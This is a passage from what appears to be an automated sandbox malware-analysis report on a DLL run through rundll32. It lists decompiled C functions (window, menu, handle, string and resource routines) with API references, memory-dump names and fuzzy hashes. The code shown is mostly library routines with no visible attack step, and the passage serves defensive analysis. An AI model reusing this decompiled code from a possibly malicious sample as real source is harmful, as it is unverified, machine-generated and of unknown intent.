					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E1000E519();
				}
				return 0;
			}

APIs

IntersectRect.USER32 ref: 10016E08
EqualRect.USER32 ref: 10016E15
IsRectEmpty.USER32 ref: 10016E1F
InvalidateRect.USER32(?,?,?), ref: 10016E3C

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: 2557517eccbb9696ab163556630543b7d1cc2db7da66443bf135cd333d30a12f
Instruction ID: 49a1a39e4a335cb1035e2ca36527126fc36f233e68e158b4c8e2f4d27b7ad01c
Opcode Fuzzy Hash: 2557517eccbb9696ab163556630543b7d1cc2db7da66443bf135cd333d30a12f
Instruction Fuzzy Hash: 5E11EC7690011AEFDF02DF94CC89FDE7BB9FF08349F0080A1FA05AA011D7719A559B60

Uniqueness

Uniqueness Score: -1.00%

Function 10011A48 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011A48(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				if(E10004D4A(__eflags, 0x10) == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10011A2B(_t9);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E1001C4CE(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

APIs

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10011A7A
GetCurrentProcess.KERNEL32(?,00000000), ref: 10011A80
DuplicateHandle.KERNEL32(00000000), ref: 10011A83
GetLastError.KERNEL32(?), ref: 10011A9E

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: 48c76622b07e1260fdb1534259b3491da0b71c0db79951e57b58b6256fd15158
Instruction ID: ab2ce72c394f12d9cf7e836f78522521826892dae628e20e317a2ba2e4d81c76
Opcode Fuzzy Hash: 48c76622b07e1260fdb1534259b3491da0b71c0db79951e57b58b6256fd15158
Instruction Fuzzy Hash: A9017C76700204AFEB15DBA5CC89F9A7FA8DF88750F158415F905CF252EA70EC40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000670D Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000670D(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E10004E6E(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000A8F0(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E1000EFCE( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

APIs

EnableMenuItem.USER32 ref: 10006745

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetFocus.USER32 ref: 1000675C
GetParent.USER32(?), ref: 1000676A
SendMessageA.USER32 ref: 1000677D

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: da181488fd32ae85599c137ac0e4151e4cf157de9effc839c6b85ff350a25f58
Instruction ID: e2afc09dcdd242cfcc452f6720a74c3cb54d3460b69826f3dc14470d92f8e7be
Opcode Fuzzy Hash: da181488fd32ae85599c137ac0e4151e4cf157de9effc839c6b85ff350a25f58
Instruction Fuzzy Hash: 88118E71504611EFE721DF20CC8881AB7F6FF88399B21CA2DF15A46969CB30BC44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000B21C Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000B21C(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000A917(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1000AF41(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1000B21C(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(?), ref: 1000B22A
GetTopWindow.USER32(00000000), ref: 1000B269
GetWindow.USER32(00000000,00000002), ref: 1000B287

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: e0b1c7dcaef5420272ec71e23bd9130895c4420cb30c111c889f194c57433dfc
Instruction ID: bb9f297338e09c47c4769c98d14c4203ded29529c07ae9fe16b63de4f6ec589b
Opcode Fuzzy Hash: e0b1c7dcaef5420272ec71e23bd9130895c4420cb30c111c889f194c57433dfc
Instruction Fuzzy Hash: 0301E93600191ABBEF13AF908C05E9F3B65EF493D0F018114FA1055065C736CA61EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10010AF2 Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E10010AF2(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					__eflags = _t13;
					if(__eflags == 0) {
						E10004E3A(_t13, _t15, WideCharToMultiByte, 0, __eflags);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}

0x10010af4
0x10010afd
0x10010b06
0x10010b1a
0x10010b1e
0x10010b22
0x10010b26
0x10010b2c
0x10010b2e
0x10010b30
0x10010b32
0x10010b32
0x10010b45
0x00000000
0x10010b4a
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 10010B06
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1001D033,00000000,00000018,1001D379), ref: 10010B1E
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 10010B26
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1001D033,00000000,00000018,1001D379), ref: 10010B45

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: 2aaaeee83b87f37a7c2fa2b797ecf6177c1475c8e7f20f5b86dc05104e7f5898
Instruction ID: c024efa3420e83baabe874ecab196389fa921329a1610a927b319e642033d1fa
Opcode Fuzzy Hash: 2aaaeee83b87f37a7c2fa2b797ecf6177c1475c8e7f20f5b86dc05104e7f5898
Instruction Fuzzy Hash: BCF0127120A2747FD2225B668C8CC9BBF9CFF8A2E97124529F58996101D6759900C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABDB Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000ABDB(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000ABDB(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000A8F0(_t13, _t14, _t18);
						}
						_t10 = E1000A917(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000ABDB(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

APIs

GetDlgItem.USER32 ref: 1000ABE6
GetTopWindow.USER32(00000000), ref: 1000ABF9

Part of subcall function 1000ABDB: GetWindow.USER32(00000000,00000002), ref: 1000AC40

GetTopWindow.USER32(?), ref: 1000AC29

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: ce071e9538a02d42f810a6b21320928da7b329cf863030978907d6d72f575913
Instruction ID: cd43aa0fe87982c1d24f281b623a533cfa4df9f459eb7cb89b98fbb4107c1cf3
Opcode Fuzzy Hash: ce071e9538a02d42f810a6b21320928da7b329cf863030978907d6d72f575913
Instruction Fuzzy Hash: F7016236501666ABFB239F518D00E8F3A99EF0B3E0F038220FD005612AE731D9D19AE5

Uniqueness

Uniqueness Score: -1.00%

Function 1002BCC5 Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002BCC5(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E1002B5C2(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E1002B6AE(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E1002BBCD(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002BB14(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 1002BCE9

Part of subcall function 1002BB14: __fltout2.LIBCMT ref: 1002BB3E

__cftog_l.LIBCMT ref: 1002BD0F
__cftoe_l.LIBCMT ref: 1002BD41

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 3b922080ff75e98142c472849b9f5e6d9f0d2bf6741c52107cc94376e2c1784d
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: C9014B3680058EBBCF129E84EC418EE3F62FF19390F948455FE1959031D736D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 10029AD3 Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E10029AD3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x10041648);
				E10022714(__ebx, __edi, __esi);
				_t31 = E10025E70(__edx, __edi, _t35);
				_t15 =  *0x100461fc; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E10023FE8(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10046100; // 0x4781328
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10045cd8;
								if(__eflags != 0) {
									_push(_t33);
									E1001F6F4(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10046100; // 0x4781328
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10046100; // 0x4781328
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E10029B6E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10020BB5(_t25, _t29, _t31, 0x20);
				}
				return E10022759(_t33);
			}

APIs

Part of subcall function 10025E70: __getptd_noexit.LIBCMT ref: 10025E71
Part of subcall function 10025E70: __amsg_exit.LIBCMT ref: 10025E7E

__amsg_exit.LIBCMT ref: 10029AFF
__lock.LIBCMT ref: 10029B0F
InterlockedDecrement.KERNEL32(?), ref: 10029B2C
InterlockedIncrement.KERNEL32(04781328), ref: 10029B57

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 56d065f265e4a70fe3f7ed656445acff29df91b79a35f532556a78a06cb7d754
Instruction ID: 7e2233ef4788b528b7c8923621eb479d41e657301323debbe484897fd832dd33
Opcode Fuzzy Hash: 56d065f265e4a70fe3f7ed656445acff29df91b79a35f532556a78a06cb7d754
Instruction Fuzzy Hash: 8D01D235900721EBDB43DB64B94574EB3A0FF09790F954014E804AB6A2D774BD81DFDA

Uniqueness

Uniqueness Score: -1.00%

Function 1000D4E7 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000D4E7(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E1000D09E(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000EC09(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1000D509
LoadResource.KERNEL32(?,00000000,?,?,?,?,10007D86,?,?,10004C5C,2EF01728), ref: 1000D515
LockResource.KERNEL32(00000000,?,?,?,?,10007D86,?,?,10004C5C,2EF01728), ref: 1000D522
FreeResource.KERNEL32(00000000,?,?,?,?,10007D86,?,?,10004C5C,2EF01728), ref: 1000D53D

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 1133495af2977c13901a6b7cbd56f9d23c2d84563ebb759bba2609409a45792e
Instruction ID: 281bcab43dd18555d5c8873d9ecd9dd0d63f565addb1b321d849296a265f2762
Opcode Fuzzy Hash: 1133495af2977c13901a6b7cbd56f9d23c2d84563ebb759bba2609409a45792e
Instruction Fuzzy Hash: B0F09636201A115FF741AF658C8893FB7ACEFC96E6B02403AFD05D2116EE618D058271

Uniqueness

Uniqueness Score: -1.00%

Function 10008219 Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10008219() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E1000EFCE(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E10007C2C(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
